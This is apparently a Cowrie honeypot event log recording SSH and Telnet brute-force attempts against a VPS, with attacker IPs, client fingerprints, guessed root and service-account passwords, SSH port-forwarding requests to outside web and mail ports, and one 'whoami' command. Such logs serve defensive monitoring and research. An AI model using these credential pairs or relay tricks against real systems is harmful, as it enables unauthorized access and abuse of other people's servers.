{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T19:20:56.402233Z","src_ip":"77.90.185.47","session":"443a4ae5f0db"}
{"eventid":"cowrie.login.success","username":"root","password":"pfsense","message":"login attempt [root/pfsense] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:20:57.021540Z","src_ip":"77.90.185.47","session":"443a4ae5f0db"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:20:57.196062Z","src_ip":"77.90.185.47","session":"443a4ae5f0db"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59560,"dst_ip":"1.2.3.4","dst_port":22,"session":"bde6da421625","protocol":"ssh","message":"New connection: 217.72.205.35:59560 (1.2.3.4:22) [session: bde6da421625]","sensor":"my-vps","timestamp":"2025-08-28T19:21:38.665743Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:21:38.667540Z","src_ip":"217.72.205.35","session":"bde6da421625"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39708,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d7f2ed72263","protocol":"ssh","message":"New connection: 212.227.125.160:39708 (1.2.3.4:22) [session: 0d7f2ed72263]","sensor":"my-vps","timestamp":"2025-08-28T19:23:46.414521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:23:46.415298Z","src_ip":"212.227.125.160","session":"0d7f2ed72263"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:23:46.465083Z","src_ip":"212.227.125.160","session":"0d7f2ed72263"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T19:23:46.621199Z","src_ip":"212.227.125.160","session":"0d7f2ed72263"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:23:47.672923Z","src_ip":"212.227.125.160","session":"0d7f2ed72263"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38341,"dst_ip":"1.2.3.4","dst_port":22,"session":"30e1dfae786e","protocol":"ssh","message":"New connection: 212.227.235.229:38341 (1.2.3.4:22) [session: 30e1dfae786e]","sensor":"my-vps","timestamp":"2025-08-28T19:24:20.339924Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:24:20.341808Z","src_ip":"212.227.235.229","session":"30e1dfae786e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38709,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd3cb9f2415a","protocol":"ssh","message":"New connection: 212.227.235.229:38709 (1.2.3.4:22) [session: bd3cb9f2415a]","sensor":"my-vps","timestamp":"2025-08-28T19:24:20.498908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:24:20.499836Z","src_ip":"212.227.235.229","session":"bd3cb9f2415a"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T19:24:20.658894Z","src_ip":"212.227.235.229","session":"bd3cb9f2415a"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:24:21.137611Z","src_ip":"212.227.235.229","session":"bd3cb9f2415a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T19:24:21.298090Z","session":"bd3cb9f2415a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40916,"dst_ip":"1.2.3.4","dst_port":23,"session":"be254081c407","protocol":"telnet","message":"New connection: 212.227.235.229:40916 (1.2.3.4:23) [session: be254081c407]","sensor":"my-vps","timestamp":"2025-08-28T19:24:24.242916Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:24:24.433236Z","src_ip":"212.227.235.229","session":"be254081c407"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:24:24.838687Z","src_ip":"212.227.235.229","session":"be254081c407"}
{"eventid":"cowrie.session.connect","src_ip":"188.174.59.254","src_port":43666,"dst_ip":"1.2.3.4","dst_port":23,"session":"47feb657f36c","protocol":"telnet","message":"New connection: 188.174.59.254:43666 (1.2.3.4:23) [session: 47feb657f36c]","sensor":"my-vps","timestamp":"2025-08-28T19:24:39.632823Z"}
{"eventid":"cowrie.session.closed","duration":16.7833411693573,"message":"Connection lost after 16 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:24:56.416095Z","src_ip":"188.174.59.254","session":"47feb657f36c"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:25:30.498944Z","src_ip":"212.227.235.229","session":"bd3cb9f2415a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39430,"dst_ip":"1.2.3.4","dst_port":22,"session":"c30d7e93a65e","protocol":"ssh","message":"New connection: 212.227.235.229:39430 (1.2.3.4:22) [session: c30d7e93a65e]","sensor":"my-vps","timestamp":"2025-08-28T19:25:33.500386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:25:33.501229Z","src_ip":"212.227.235.229","session":"c30d7e93a65e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:25:33.600264Z","src_ip":"212.227.235.229","session":"c30d7e93a65e"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T19:25:33.900271Z","src_ip":"212.227.235.229","session":"c30d7e93a65e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:25:35.002044Z","src_ip":"212.227.235.229","session":"c30d7e93a65e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65399,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a0721f09b47","protocol":"ssh","message":"New connection: 212.227.235.229:65399 (1.2.3.4:22) [session: 2a0721f09b47]","sensor":"my-vps","timestamp":"2025-08-28T19:26:07.802112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:26:07.803020Z","src_ip":"212.227.235.229","session":"2a0721f09b47"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:26:07.944860Z","src_ip":"212.227.235.229","session":"2a0721f09b47"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@123","message":"login attempt [root/admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:26:08.542560Z","src_ip":"212.227.235.229","session":"2a0721f09b47"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T19:26:08.673649Z","session":"2a0721f09b47"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T19:26:08.802210Z","src_ip":"212.227.235.229","session":"2a0721f09b47"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:26:08.931540Z","src_ip":"212.227.235.229","session":"2a0721f09b47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:27:24.884565Z","src_ip":"212.227.235.229","session":"be254081c407"}
{"eventid":"cowrie.session.closed","duration":180.64884066581726,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:27:24.890841Z","src_ip":"212.227.235.229","session":"be254081c407"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":60992,"dst_ip":"1.2.3.4","dst_port":22,"session":"deb4224d452c","protocol":"ssh","message":"New connection: 186.225.142.90:60992 (1.2.3.4:22) [session: deb4224d452c]","sensor":"my-vps","timestamp":"2025-08-28T19:28:18.662939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:28:18.664016Z","src_ip":"186.225.142.90","session":"deb4224d452c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T19:28:18.856163Z","src_ip":"186.225.142.90","session":"deb4224d452c"}
{"eventid":"cowrie.login.success","username":"root","password":"102699","message":"login attempt [root/102699] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:28:19.626379Z","src_ip":"186.225.142.90","session":"deb4224d452c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:28:20.032659Z","src_ip":"186.225.142.90","session":"deb4224d452c"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T19:28:20.033383Z","src_ip":"186.225.142.90","session":"deb4224d452c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:28:20.227847Z","src_ip":"186.225.142.90","session":"deb4224d452c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:28:20.229003Z","src_ip":"186.225.142.90","session":"deb4224d452c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52642,"dst_ip":"1.2.3.4","dst_port":22,"session":"00d1167234c2","protocol":"ssh","message":"New connection: 217.72.205.35:52642 (1.2.3.4:22) [session: 00d1167234c2]","sensor":"my-vps","timestamp":"2025-08-28T19:28:22.549411Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:28:22.550655Z","src_ip":"217.72.205.35","session":"00d1167234c2"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":8366,"dst_ip":"1.2.3.4","dst_port":22,"session":"e71d4204a6c5","protocol":"ssh","message":"New connection: 80.94.95.15:8366 (1.2.3.4:22) [session: e71d4204a6c5]","sensor":"my-vps","timestamp":"2025-08-28T19:29:25.863313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:29:25.957619Z","src_ip":"80.94.95.15","session":"e71d4204a6c5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:29:26.023942Z","src_ip":"80.94.95.15","session":"e71d4204a6c5"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett","message":"login attempt [bennett/bennett] failed","sensor":"my-vps","timestamp":"2025-08-28T19:29:26.375769Z","src_ip":"80.94.95.15","session":"e71d4204a6c5"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett1","message":"login attempt [bennett/bennett1] failed","sensor":"my-vps","timestamp":"2025-08-28T19:29:27.447235Z","src_ip":"80.94.95.15","session":"e71d4204a6c5"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett123","message":"login attempt [bennett/bennett123] failed","sensor":"my-vps","timestamp":"2025-08-28T19:29:28.516152Z","src_ip":"80.94.95.15","session":"e71d4204a6c5"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett1234","message":"login attempt [bennett/bennett1234] failed","sensor":"my-vps","timestamp":"2025-08-28T19:29:29.592690Z","src_ip":"80.94.95.15","session":"e71d4204a6c5"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett12345","message":"login attempt [bennett/bennett12345] failed","sensor":"my-vps","timestamp":"2025-08-28T19:29:30.662375Z","src_ip":"80.94.95.15","session":"e71d4204a6c5"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:29:31.731770Z","src_ip":"80.94.95.15","session":"e71d4204a6c5"}
{"eventid":"cowrie.session.connect","src_ip":"172.237.81.21","src_port":59978,"dst_ip":"1.2.3.4","dst_port":23,"session":"6bed865a4b78","protocol":"telnet","message":"New connection: 172.237.81.21:59978 (1.2.3.4:23) [session: 6bed865a4b78]","sensor":"my-vps","timestamp":"2025-08-28T19:30:38.823400Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T19:30:39.690295Z","src_ip":"172.237.81.21","session":"6bed865a4b78"}
{"eventid":"cowrie.session.closed","duration":3.2337796688079834,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:30:42.057114Z","src_ip":"172.237.81.21","session":"6bed865a4b78"}
{"eventid":"cowrie.session.connect","src_ip":"172.237.81.21","src_port":49046,"dst_ip":"1.2.3.4","dst_port":23,"session":"b75c813d30c3","protocol":"telnet","message":"New connection: 172.237.81.21:49046 (1.2.3.4:23) [session: b75c813d30c3]","sensor":"my-vps","timestamp":"2025-08-28T19:30:42.344185Z"}
{"eventid":"cowrie.session.closed","duration":4.854328632354736,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:30:47.197591Z","src_ip":"172.237.81.21","session":"b75c813d30c3"}
{"eventid":"cowrie.session.connect","src_ip":"172.237.81.21","src_port":49060,"dst_ip":"1.2.3.4","dst_port":23,"session":"5d7117e2e50d","protocol":"telnet","message":"New connection: 172.237.81.21:49060 (1.2.3.4:23) [session: 5d7117e2e50d]","sensor":"my-vps","timestamp":"2025-08-28T19:30:47.372867Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:30:48.341185Z","src_ip":"172.237.81.21","session":"5d7117e2e50d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:30:48.361656Z","src_ip":"172.237.81.21","session":"5d7117e2e50d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"3.6","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:30:51.912273Z","src_ip":"172.237.81.21","session":"5d7117e2e50d"}
{"eventid":"cowrie.session.closed","duration":4.543804883956909,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:30:51.916600Z","src_ip":"172.237.81.21","session":"5d7117e2e50d"}
